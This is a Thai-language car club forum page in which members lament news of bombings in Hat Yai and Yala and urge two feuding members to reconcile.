ผมดูข่าวทีวีที่เกิดระเบิดที่หาดใหญ่และที่ยะลาแล้วผมเศร้าใจ แบบนี้ซิครับที่มันสมควรที่จะไม่ให้อภัยเพราะผมจะถือว่าคนที่ทำแบบนี้ได้ถือว่าไม่ไช่คนไทย สุดท้ายนี้ผมอยากจะบอกว่าผมรัก civicesgroup ผมรักพี่น้องทุกคนที่อยู่ในคลับแห่งนี้และที่สำคัญ ผมอยากเห็นคุณโมนกับคุณเต๋าจับมือกัน
เคลียร์ปัญหาที่เกิดขึ้นให้จบโดยเร็วผมเชื่อว่าพี่น้องในคลับแห่งนี้ก็อยากเห็นเหมือนกัน(เพราะตอนนี้หลายๆคนกำลังเอาใจช่วยคุณ2คนอยู่) สู้สู้ครับผม
blackhawkpearl

ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

อังคาร, 3 เมษา 2012 01:39 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
ไม่มีความเห็นดีกว่า    เพราะไม่รู้ความจริง   เข้าหน้าร้อนแล้วคนก็เลยใจร้อนด้วยมั้ง
ได้รับคำขอบคุณจาก: kantaphat 
หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
หน้า 7 จาก 8
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.